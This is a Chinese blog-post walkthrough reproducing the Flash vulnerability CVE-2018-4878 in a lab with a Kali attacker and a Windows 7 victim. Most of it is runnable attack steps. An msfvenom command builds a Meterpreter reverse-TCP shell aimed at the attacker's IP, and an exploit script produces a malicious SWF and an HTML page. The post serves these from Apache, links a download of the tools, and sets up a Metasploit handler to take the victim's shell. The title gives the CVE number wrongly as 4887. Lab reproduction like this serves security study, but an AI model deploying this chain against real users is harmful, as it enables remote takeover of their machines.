[漏洞复现]CVE-2018-4887 Flash 0day

1、漏洞概述

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。

 

攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。

 

2、实验环境

攻击机:kali 2017 + exp:cve-2018-4878.py 

攻击机IP:192.168.190.130

靶机:Windows 7 + flash:flashplayer_activex_28.0.0.137.exe

靶机IP:192.168.190.131

 

3、实验利用工具

链接: https://pan.baidu.com/s/1nnUCy8xPbcIgT24ddo6D1A 密码: e292

 

4、漏洞复现

将网盘中的CVE-2018-4878-master目录下载下来,并放入kali linux 桌面

 

使用msfvenom生成shell代码

生成代码,其中lhost为kali的ip地址,lport为自定义的端口号
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.130 lport=8888 -f python>shellcode.txt

 

查看代码
root@kali:~# cat shellcode.txt 

 

 在CVE-2018-4878-master目录,编辑CVE-2018-2878.py

将上面msfvenom生成的代码覆盖原来的代码,如下:

 

 修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出):

 

 进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878.py代码

进入CVE-2018-4878-master路径
root@kali:~# cd 桌面/CVE-2018-4878-master
执行CVE-2018-4878.py代码
root@kali:~/桌面/CVE-2018-4878-master# python cve-2018-4878.py 

执行完后会多出两个文件

 

kali linux 开启Apache2服务,并将上面生成的2个文件放入/var/www/html目录中

root@kali:~/桌面/CVE-2018-4878-master# service apache2 start
root@kali:~/桌面/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html
root@kali:~/桌面/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf

此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。

 

kali开启shell会话监听

启动msf
root@kali:~# msfconsole 
使用handler监听模块
msf > use exploit/multi/handler
设置一个tcp回弹连接  
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
设置kali渗透机的ip地址
msf exploit(handler) > set LHOST 192.168.190.130
设置监听端口,这个需跟上面msfvenom设置的端口一致
msf exploit(handler) > set LPORT 8888
开启监听,等待肉鸡上线
msf exploit(handler) > exploit 

 

 在win 7中安装flash插件,并用IE浏览器访问页面

将网盘中的flash安装包下载下来放到Windows 7中,并安装

 

 使用Win 7内置的IE 8浏览器访问页面192.168.190.130/index2.html

 

在kali linux上获取meterpreter shell,并进行管理

查看会话
msf exploit(handler) > sessions 
连接会话
msf exploit(handler) > sessions -i 2

 

 实验总结:

可以看到,最终由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制。

 

真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果。

 

posted @ 2018-06-08 14:19  ESHLkangi  阅读(856)  评论(0编辑  收藏  举报